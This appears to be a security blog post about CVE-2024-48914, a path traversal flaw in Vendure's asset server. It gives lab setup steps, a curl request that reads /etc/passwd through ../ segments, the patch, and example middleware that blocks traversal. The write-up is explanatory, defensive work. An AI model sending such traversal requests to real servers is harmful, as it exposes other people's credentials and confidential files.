CVE-2024-48914: Arbitrary File Read Vulnerability in Vendure

2024-10-26
Kamran Hasan

Introduction

CVE-2024-48914 is a path traversal vulnerability in older versions of Vendure, an open-source headless commerce platform. A flaw in the asset server plugin lets a remote attacker read arbitrary files on the server by requesting a crafted asset path, exposing sensitive data such as configuration files, source code and anything else the Vendure process can read.

Understanding the Vulnerability

The asset server plugin takes the file path from the request URL and uses it to locate the asset on disk without validating that the result stays inside the asset directory. A request containing ../ segments therefore walks up out of that directory, and the server returns whatever file the path points at.

Key Vulnerability Details:

  • Vulnerable Component: Asset server plugin

  • Attack Vector: A crafted, unauthenticated HTTP request to the asset server endpoint

  • Impact: Arbitrary file reading, potential data exposure

  • Affected Versions: Vendure 3.x before 3.0.5 and 2.x before 2.3.3

Technical Breakdown

  • Malicious Request Construction:

    • An attacker can construct a malicious HTTP request targeting the asset server endpoint.

    • By carefully crafting the request URL, the attacker can manipulate the file path to access files outside the intended directory.

    • This can be achieved by using directory traversal techniques, such as ../ sequences, to move up the directory hierarchy.

  • Server-Side File Reading:

    • The server, without proper validation, processes the malicious request and attempts to read the specified file.

    • The file contents are then returned to the attacker in the response.

Exploitation Scenarios

  • Data Exfiltration:

    • Attackers can access and download sensitive configuration files, source code, or other confidential data.

    • This information can be used to gain deeper insights into the system's vulnerabilities or to launch further attacks.

  • System Compromise:

    • By reading system files, attackers can gain information about the server's configuration, installed software, and security measures.

    • This knowledge can be used to identify potential attack vectors or to compromise the system in other ways.

Proof of Concept

Building a lab for CVE-2024-48914 requires hosting the vulnerable version of Vendure in a local environment that we can use as the target for the exploit.

Installing the Vendure app is a multi-step procedure. First, clone Vendure from its official GitHub repository:

git clone https://github.com/vendure-ecommerce/vendure/
cd vendure/

But we are interested in the vulnerable version, so we check out the v3.0.4 tag (the last 3.x release before the fix):

git checkout v3.0.4

Now we will install the top level dependencies and build all packages:

npm install
npm run build

The next step is to set up the databases. The following docker compose file hosts them (the ports are published on all interfaces and the credentials are weak, which is fine for an isolated lab but nothing else):

version: '3.7'
name: vendure-monorepo
services:
  mariadb:
    image: 'bitnami/mariadb:latest'
    container_name: mariadb
    environment:
      MARIADB_DATABASE: vendure-dev
      MARIADB_ROOT_USER: vendure
      MARIADB_ROOT_PASSWORD: password
    volumes:
      - 'mariadb_data:/bitnami'
    ports:
      - '3306:3306'
  elasticsearch:
    image: docker.elastic.co/elasticsearch/elasticsearch:7.10.2
    container_name: elasticsearch
    environment:
      - discovery.type=single-node
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
    ulimits:
      memlock:
        soft: -1
        hard: -1
    volumes:
      - esdata:/usr/share/elasticsearch/data
    ports:
      - 9200:9200
  redis:
    image: bitnami/redis:7.4.1
    hostname: redis
    container_name: redis
    environment:
      - ALLOW_EMPTY_PASSWORD=yes
    ports:
      - "6379:6379"
volumes:
  mariadb_data:
    driver: local
  esdata:
    driver: local

Now let's bring them up:

docker compose up --build

Next, update the dev server's config file with the database connection details. The config file is located at vendure/packages/dev-server/dev-config.ts.

In my updated dev config, the host value is the IP address of the Docker container running the MariaDB server.

Now we are all set to populate the database and start Vendure's dev server:

npm run populate
npm run dev

That's all that is needed to set up the vulnerable target for CVE-2024-48914. Let's discuss the exploitation now.

To read an arbitrary file from the host running the vulnerable target, we use path traversal against the /assets/ endpoint. The curl command to read /etc/passwd looks like this. The traversal starts from the asset directory (vendure/packages/dev-server/assets/ in this lab), and --path-as-is is required because curl would otherwise collapse the ../ segments client-side before sending the request:

curl -s --path-as-is "localhost:3000/assets/../../../../../../../etc/passwd"

Patch Details

The patch commit fixes the vulnerability by adding a method that sanitizes the requested file path before it is used to locate a file.

  • The path.normalize method standardizes the path format by resolving sequences like /../ and /./, turning them into a canonical form. For example, path.normalize("/folder/../file") simplifies to /file.

  • This removes redundant parts of the path. It does not strip leading ../ segments from a relative path (path.normalize("../../etc/passwd") stays ../../etc/passwd), so the normalized result can be checked for traversal that would leave the asset directory.

Mitigation Strategies

  • Update Vendure: 

    • Install the patched releases (3.0.5 for the 3.x line, 2.3.3 for the 2.x line, or later). These include the fix that stops arbitrary file reads through the asset server.

  • Workarounds:

    • Object Storage: Store assets in an object store such as MinIO or S3 instead of the local filesystem. A storage strategy that is not backed by the local disk has no directory tree to traverse.

    • Middleware: Add custom middleware in front of the asset route that rejects requests whose decoded path contains ../ sequences.
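As an added example of the middleware workaround (not Vendure's code; the mount point /assets/ and the function names are assumptions), here is a framework-agnostic function in the Express (req, res, next) shape that rejects traversal attempts at the HTTP layer, before any file handling runs. It complements a filesystem containment check rather than replacing it, because it only ever sees the URL.

```javascript
// Added example, not Vendure's own code. Works with any Express-style stack;
// mount it ahead of the asset handler.
const ASSET_PREFIX = '/assets/'; // assumed mount point of the asset server

// Decide whether a raw request URL is a traversal attempt against the asset
// route. Decoding happens exactly once: a double-encoded "%252e%252e" decodes
// to the literal "%2e%2e", which no later layer should decode again.
function isTraversalAttempt(rawUrl) {
  const rawPath = rawUrl.split('?')[0]; // traversal lives in the path, not the query
  let decoded;
  try {
    decoded = decodeURIComponent(rawPath);
  } catch (e) {
    return true; // malformed percent-encoding: refuse rather than guess
  }
  if (decoded.includes('\0')) {
    return true; // a NUL byte has no legitimate place in a file name
  }
  // Treat backslashes as separators too, so "..\" is caught on hosts that
  // accept them, then look for any ".." segment.
  const segments = decoded.replace(/\\/g, '/').split('/');
  return segments.includes('..');
}

// Middleware: 400 on traversal attempts under the asset prefix, otherwise hand
// off to the next handler. Each rejection is worth logging: browsers and curl
// collapse dot segments client-side by default, so a request that still
// carries them was built deliberately.
function blockAssetTraversal(req, res, next) {
  if (!req.url.startsWith(ASSET_PREFIX)) {
    return next();
  }
  if (isTraversalAttempt(req.url)) {
    res.statusCode = 400;
    res.end('Bad Request');
    return;
  }
  next();
}

// Drive the middleware with a constructed request and report what happened,
// so the behaviour can be checked without a running server.
function simulate(url) {
  const outcome = { status: 200, passed: false };
  const req = { url };
  const res = {
    statusCode: 200,
    end() { outcome.status = res.statusCode; },
  };
  blockAssetTraversal(req, res, () => { outcome.passed = true; });
  return outcome;
}
```

simulate('/assets/../../../../../../../etc/passwd') and simulate('/assets/%2e%2e/%2e%2e/etc/passwd') both end with status 400 and never reach the next handler, while simulate('/assets/preview/logo.png?w=200') passes through. Note that /assets/%252e%252e/secret also passes this layer, since a single decode yields the harmless literal %2e%2e; that is why the containment check in the storage layer still has to exist.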

Security Best Practices:

  • Regularly update all software components to address known vulnerabilities.

  • Implement strong password policies and enforce multi-factor authentication.

  • Regularly review and update security configurations.

  • Conduct regular security audits and penetration testing to identify and address potential vulnerabilities.

Conclusion

CVE-2024-48914 highlights the importance of keeping software up-to-date and following security best practices. By promptly updating Vendure to the latest version or implementing the recommended workarounds, organizations can mitigate the risk of this vulnerability and protect their e-commerce platforms.

Disclaimer

The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2024-48914 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.

It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.
